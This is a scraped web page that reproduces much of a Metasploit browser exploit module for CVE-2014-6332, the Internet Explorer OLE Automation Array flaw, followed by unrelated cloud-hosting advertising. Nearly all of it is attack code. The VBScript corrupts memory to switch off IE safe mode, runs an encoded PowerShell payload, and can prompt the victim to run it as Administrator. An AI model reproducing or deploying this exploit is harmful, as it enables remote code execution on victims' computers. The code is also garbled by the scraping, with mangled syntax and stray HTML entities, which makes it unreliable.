Home > Industries > Internet
# # # This module requires metasploit:http://metasploit.com/download# current source:https://github.com/rapid7/ Metasploit-framework## require ' msf/core ' require ' Msf/core/exploit/powershell ' class Metasploit4 < msf::exploit::remote Rank = excellentranking include Msf::exploit::remote:: browserexploitserver include msf::exploit::remote::browserautopwn include Msf::exploit::P Owershell Autopwn_info ({ : ua_name => httpclients::ie, : Ua_minver = > "3.0", : Ua_maxver => "10.0", : JavaScript = true, : os_name => operatingsystems::match::windows, : rank = excellentranking }) & nbsp; def Initialize (info={}) super (Update_info (info, ' Name ' "Microsoft Internet Explorer Windows OLE Automation Array Remote CodeExecution ", ' Description ' =>%q{ This module exploits Windo WS OLE Automation Array vulnerability known as cve-2014-6332. The vulnerability affects interne T Explorer 3.0 until version one within Windows95 up to Windows 10. Powershell are required on th E Target machine. On Internet Explorer versions using Protected mode, The user have to manually allow POWERSHELL.E Xe-to-execute in order-to-be compromised. }, ' License ' = = msf_license, ' Author ' => [   ; ' Robert Freeman ', # IBM x-force ' Yuange ', # TWITTER.COM/YUANGE75&NB Sp ' Rik van Duijn ', # twitter.com/rikvduijn ' Wesley Neelen ', #security[at]forsec.nl ' Gradiusx <francescomifsud[at]gmail.com> ', ' b33f ', # @FuzzySec ], ' References ' => ; [ [' CVE ', ' 2014-6332 '], [' MSB ', ' ms14-064 '], [' Osvdb ', ' 114533 '], [' EDB ' , ' 35229 '], [' EDB ', ' 35308 '], [' URL ', ' Http://secu Rityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows '], [' URL ', ' Https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module '] & nbsp ], ' Platform ' = ' win ', ' Targets ' &NB Sp => [ [' Windows x86 ', {' Arch ' = arch_x86}], ],&NB Sp ' browserrequirements ' => { : source &NBSP;=&G T /script|headers/i, : Ua_name = httpclients::ie, : OS _name =/win/i, : Arch => ' x86 ', : U A_ver => Lambda {|ver| ver.to_i.between? ( 4,} }, ' defaultoptions ' => {   ; ' http::compression ' = ' gzip ' }, ' Payload ' & nbsp => { ' badchars ' =& Gt "\x00" }, ' privileged ' = false, ' disclosuredate ' + "Nov", ' Defaulttarget ' = > 0) register_options ( [ Optbool.new (' Tryuac ', [true, ' Ask victim to start as Administrator ', false]), ], Self.class) &N bsp; end def vbs_prepare () code =%q|dim AA () Dim AB () Dim A0dim A1dim A2dim A3dim Win9xdim Intversiondim Rndadim Funclassdim MYARRAY&NBSP ; Begin () nelinefunction begin () on Error Resume next info=navigator.useragent if (InStr ( info, "Win64") >0) then exit function End if if (InStr (Info, "MSIE") & gt;0) then intversion = CInt (Mid (info, InStr (info, "MSIE") + 5, 2)) & nbsp else exIt function end if win9x=0 begininit () if Create () =true then & nbsp myarray= &NBSP;CHRW (2176) &CHRW (&CHRW) &chrw (xx) &chrw ( XX) &chrw (&CHRW) &NBSP;MYARRAY=MYARRAY&CHRW (xx) &chrw (32767) &chrw (XX) & ChrW (0) if (intversion<4) then document.write ("<br> IE ") document.write (intversion) runshellcode () else Setnotsafemode () end if End IfEnd Function&nb Sp;function BeginInit () randomize () redim AA (5) redim AB (5) a0=13+17* Rnd (6) &NBSP;A3=7+3*RND (5) End Function function Create () on Error Resume next Dim i create= false for i = 0 to 400 If over () =true then ' document.write (i) Create=True exit For&nbs P End if NextEnd function sub Testaa () End Sub function MyData () on Error Resume Next&nbs P i=testaa i=null redim preserve AA (A2) ab (0) =0 &NBSP;AA (A1) =i ab (0) =6.36598737437801e-314 &NBSP;AA (a1+2) =myarray ab (2) =1.74088534731324e-310 &NBSP;MYDATA=AA (A1) ReDim preserve AA (A0) End Function function Setnotsafemode () on Error Resume next i=m Ydata () I=readmemo (i+8) I=readmemo (i+16) J=readmemo (i+&h134) For k=0 to &h60 step 4 J=readmemo (i+&h120+k) if (j=14) THEN&N Bsp j=0 ReDim preserve AA (A2) &NBSP;AA (a1+2) (i+&h11c+k ) =ab (4) ReDim preserve AA (A0) j=0 &NB Sp J=readmemo (i+&h120+k) e XIT for end if next AB (2) =1.69759663316747E-313&N Bsp RUNAAAA () end function function over () on Error Resume next Dim type1,type2,type3&nb Sp over=false a0=a0+a3 a1=a0+2 a2=a0+&h8000000 ReDim & nbsp Preserve AA (A0) ReDim AB (A0) ReDim preserve AA (A2) type1= 1 AB (0) =1.123456789012345678901234567890 AA (A0) =10 If (IsObject (AA (A1-1) ) = False) THEN&NBsp if (intversion<4) then mem=cint (a0+1) *16 & nbsp j=vartype (AA (a1-1)) if ((j=mem+4) or (j*8=mem+8)) then & nbsp if (VarType (AA (a1-1)) <>0) Then &NBS P if (IsObject (AA (a1)) = False) then type1= VarType (AA (A1)) end if &NBS P End if else redim pres Erve AA (A0) exit function &NB Sp;end if else if (VarType (AA (a1-1)) <>0) th en If (IsObject (AA (a1)) = False) then &NB Sp Type1=vartype (AA (A1)) End if &NBS P End if End if End if if (type1=&h2f66) Then&nbs P over=true End if If (TYPE1=&HB9AD) then &NBSP ; over=true win9x=1 End if ReDim preserve AA ( A0) end Function function Readmemo (add) on Error Resume next ReDim preserve AA ( A2) AB (0) =0 AA (A1) =add+4 AB (0) =1.69759663316747e-313 Readmemo=lenb (AA (A1)) AB (0) =0 ReDim preserve AA (A0) End function | END&Nbsp; def get_html () if datastore[' Tryuac '] tryuac = ' runas ' else TRYUAC = ' open ' end Payl = Cmd_psh_payload (payload.encoded, "x86", {: R Emove_comspec = true}) payl.slice! "Powershell.exe" PREP = Vbs_prepare () HTML =%q|<!doctype html>
Chinese cold Dragon produced-windows Internet Explorer OLE Automation array Remote Code execution vulnerability
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
